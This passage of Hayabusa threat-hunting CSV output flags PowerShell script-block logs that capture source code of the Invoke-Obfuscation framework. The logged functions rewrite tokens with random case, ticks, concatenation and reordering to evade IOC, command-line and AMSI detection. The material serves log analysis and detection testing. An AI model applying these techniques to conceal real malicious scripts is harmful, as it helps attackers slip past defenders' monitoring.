$CurrentChar } } # If $Token immediately follows a . or :: (and does not begin $ScriptString) then encapsulate with double quotes so ticks are valid. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. $ObfuscatedToken = '""' + $ObfuscatedToken + '""' } ElseIf($EncapsulateWithDoubleQuotes) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. $ObfuscatedToken = '""' + $ObfuscatedToken + '""' } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedMemberTokenLevel3 { <# .SYNOPSIS Obfuscates member token by randomizing its case, randomly concatenating the member as a string and adding the .invoke operator. This enables us to treat a member token as a string to gain the obfuscation benefits of a string. Invoke-Obfuscation Function: Out-ObfuscatedMemberTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedMemberTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Member token value. .EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1}} C:\PS> $ScriptString [console]::('wR'+'It'+'eline').Invoke('Hello World!'); [console]::('wrItEL'+'IN'+'E').Invoke('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2}} C:\PS> $ScriptString [console]::(""{0}{2}{1}""-f 'W','ITEline','r').Invoke('Hello World!'); [console]::(""{2}{1}{0}"" -f 'liNE','RITE','W').Invoke('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Member' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index, [Parameter(Position = 3, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $Token = $Tokens[$Index] # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # If $Token immediately follows a . or :: (and does not begin $ScriptString) of if followed by [] type cast within # parentheses then only allow Member token to be obfuscated with ticks and quotes. # The exception to this is when the $Token is immediately followed by an opening parenthese, like in .DownloadString( # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript # E.g. If $Token is 'Invoke' then concatenating it and then adding .Invoke() would be redundant. $RemainingSubString = 50 If($RemainingSubString -gt $ScriptString.SubString($Token.Start+$Token.Length).Length) { $RemainingSubString = $ScriptString.SubString($Token.Start+$Token.Length).Length } # Parse out $SubSubString to make next If block a little cleaner for handling fringe cases in which we will revert to ticks instead of concatenation or reordering of the Member token value. $SubSubString = $ScriptString.SubString($Token.Start+$Token.Length,$RemainingSubString) If(($Token.Content.ToLower() -eq 'invoke') ` -OR (((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) ` -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) ` -AND (($ScriptString.Length -ge $Token.Start+$Token.Length+1) -AND (($SubSubString.SubString(0,1) -ne '(') -OR (($SubSubString.Contains('[')) -AND !($SubSubString.SubString(0,$SubSubString.IndexOf('[')).Contains(')'))))))) { # We will use the scriptString length prior to obfuscating 'invoke' to help extract the this token after obfuscation so we can add quotes before re-inserting it. $PrevLength = $ScriptString.Length # Obfuscate 'invoke' token with ticks. $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token #$TokenLength = 'invoke'.Length + ($ScriptString.Length - $PrevLength) $TokenLength = $Token.Length + ($ScriptString.Length - $PrevLength) # Encapsulate obfuscated and extracted token with double quotes if it is not already. $ObfuscatedTokenExtracted = $ScriptString.SubString($Token.Start,$TokenLength) If($ObfuscatedTokenExtracted.StartsWith('""') -AND $ObfuscatedTokenExtracted.EndsWith('""')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedTokenExtracted + $ScriptString.SubString($Token.Start+$TokenLength) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + '""' + $ObfuscatedTokenExtracted + '""' + $ScriptString.SubString($Token.Start+$TokenLength) } Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Member token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Member Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Retain current token before re-tokenizing if 'invoke' member was introduced (see next For loop below) $InvokeToken = $Token # Retain how much the token has increased during obfuscation process so far. $TokenLengthIncrease = $ObfuscatedToken.Length - $Token.Content.Length # Add .Invoke if Member token was originally immediately followed by '(' If(($Index -lt $Tokens.Count) -AND ($Tokens[$Index+1].Content -eq '(') -AND ($Tokens[$Index+1].Type -eq 'GroupStart')) { $ObfuscatedToken = $ObfuscatedToken + '.Invoke' } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedCommandArgumentTokenLevel3 { <# .SYNOPSIS Obfuscates command argument token by randomly concatenating the command argument as a string and encapsulating it with parentheses. Invoke-Obfuscation Function: Out-ObfuscatedCommandArgumentTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandArgumentTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Argument token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor ('Gr'+'een'); Write-Host 'Obfuscation Rocks!' -ForegroundColor (""Gree""+""n"") C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor (""{1}{0}""-f 'een','Gr'); Write-Host 'Obfuscation Rocks!' -ForegroundColor (""{0}{1}"" -f 'Gre','en') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Function name declarations are CommandArgument tokens that cannot be obfuscated with concatenations. # For these we will obfuscated them with ticks because this changes the string from AMSI's perspective but not the final functionality. If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function')) #If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function') -or $ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('filter')) { $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # User input $ObfuscationLevel (1-2) will choose between concatenating CommandArgument token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLev",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"el value ($ObfuscationLevel) was passed to switch block for Argument Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedTypeToken { <# .SYNOPSIS Obfuscates type token by using direct type cast syntax and concatenating or reordering the Type token value. This function only applies to Type tokens immediately followed by . or :: operators and then a Member token. E.g. [Char][Int]'123' will not be obfuscated by this function, but [Console]::WriteLine will be obfuscated. Invoke-Obfuscation Function: Out-ObfuscatedTypeToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTypeToken obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Type token value. .EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} C:\PS> $ScriptString sET EOU ( [TYPe]('CO'+'NS'+'oLe')) ; ( CHILdiTEM VariablE:EOU ).VALUE::WriteLine('Hello World!'); $eoU::WriteLine('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} C:\PS> $ScriptString SET-vAriablE BVgz6n ([tYpe](""{2}{1}{0}"" -f'sOle','On','C') ) ; $BVGz6N::WriteLine('Hello World!'); ( cHilDItem vAriAbLE:bVGZ6n ).VAlue::WriteLine('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 1 C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # If we are dealing with a Type that is found in $TypesThatCannotByDirectTypeCasted then return as is since it will error if we try to direct Type cast. ForEach($Type in $TypesThatCannotByDirectTypeCasted) { If($Token.Content.ToLower().Contains($Type)) { Return $ScriptString } } # If we are dealing with a Type that is NOT immediately followed by a Member token (denoted by . or :: operators) then we won't obfuscated. # This is for Type tokens like: [Char][Int]'123' etc. If(($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,1) -ne '.') -AND ($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,2) -ne '::')) { Return $ScriptString } # This variable will be used to track the growth in length of $ScriptString since we'll be appending variable creation at the beginning of $ScriptString. # This will allow us to avoid tokenizing $ScriptString for every single Type token that is present. $PrevLength = $ScriptString.Length # See if we've already set another instance of this same Type token previously in this obfsucation iteration. $RandomVarName = $NULL $UsingPreviouslyDefinedVarName = $FALSE ForEach($DefinedTokenVariable in $Script:TypeTokenVariableArray) { If($Token.Content.ToLower() -eq $DefinedTokenVariable[0]) { $RandomVarName = $DefinedTokenVariable[1] $UsingPreviouslyDefinedVarName = $TRUE } } # If we haven't already defined a random variable for this Token type then we will do that. Otherwise we will use the previously-defined variable. If(!($UsingPreviouslyDefinedVarName)) { # User input $ObfuscationLevel (1-2) will choose between concatenating Type token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce another Type token unnecessarily ([Regex]). # Trim of encapsulating square brackets before obfuscating the string value of the Type token. $TokenContent = $Token.Content.Trim('[]') Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Type Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Add syntax for direct type casting. $ObfuscatedTokenTypeCast = '[type]' + '(' + $ObfuscatedToken + ')' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Track this variable name and Type token so we can reuse this variable name for future uses of this same Type token in this obfuscation iteration. $Script:TypeTokenVariableArray += , @($Token.Content,$RandomVarName) } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' $RandomVarSetSyntax += 'Set-Item' + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. $RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # If we're using an existing variable already set in ScriptString for the current Type token then we don't need to prepend an additional SET variable syntax. $PortionToPrependToScriptString = '' If(!($UsingPreviouslyDefinedVarName)) { $PortionToPrependToScriptString = ' '*(Get-Random @(0..2)) + $RandomVarSet + ' '*(Get-Random @(0..2)) + ';' + ' '*(Get-Random @(0..2)) } # Add the obfuscated token back to $ScriptString. $ScriptString = $PortionToPrependToScriptString + $ScriptString.SubString(0,$Token.Start+$Script:TypeTokenScriptStringGrowth) + ' '*(Get-Random @(1..2)) + $RandomVarGet + $ScriptString.SubString($Token.Start+$Token.Length+$Script:TypeTokenScriptStringGrowth) # Keep track how much $ScriptString grows for each Type token obfuscation iteration. $Script:TypeTokenScriptStringGrowth = $Script:TypeTokenScriptStringGrowth + $PortionToPrependToScriptString.Length Return $ScriptString } Function Out-ObfuscatedVariableTokenLevel1 { <# .SYNOPSIS Obfuscates variable token by randomizing its case, randomly adding ticks and wrapping it in curly braces. Invoke-Obfuscation Function: Out-ObfuscatedVariableTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedVariableTokenLevel1 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Variable'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} C:\PS> $ScriptString ${m`e`ssAge1} = 'Hello World!'; Write-Host ${MEss`Ag`e1} -ForegroundColor Green; ${meSsAg`e`2} = 'Obfuscation Rocks!'; Write-Host ${M`es`SagE2} -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green} 'Variable' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Return as-is if the variable is already encapsulated with ${}. Otherwise you will get errors if you have something like ${var} turned into ${${var}} If($ScriptString.SubString($Token.Start,2) -eq '${') { Return $ScriptString } # Length of pre-obfuscated ScriptString will be important in extracting out the obfuscated token before we add curly braces. $PrevLength = $ScriptString.Length $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token # Pull out ObfuscatedToken from ScriptString and add curly braces around obfuscated variable token. $ObfuscatedToken = $ScriptString.SubString($Token.Start,$Token.Length+($ScriptString.Length-$PrevLength)) $ObfuscatedToken = '${' + $ObfuscatedToken.Trim('""') + '}' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length+($ScriptString.Length-$PrevLength)) Return $ScriptString } Function Out-RandomCaseToken { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and reinserting it into the ScriptString input variable. Invoke-Obfuscation Function: Out-RandomCaseToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCaseToken obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RandomCaseToken $ScriptString $Token} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor GREeN; Write-Host 'Obfuscatio",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"el value ($ObfuscationLevel) was passed to switch block for Argument Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedTypeToken { <# .SYNOPSIS Obfuscates type token by using direct type cast syntax and concatenating or reordering the Type token value. This function only applies to Type tokens immediately followed by . or :: operators and then a Member token. E.g. [Char][Int]'123' will not be obfuscated by this function, but [Console]::WriteLine will be obfuscated. Invoke-Obfuscation Function: Out-ObfuscatedTypeToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTypeToken obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given 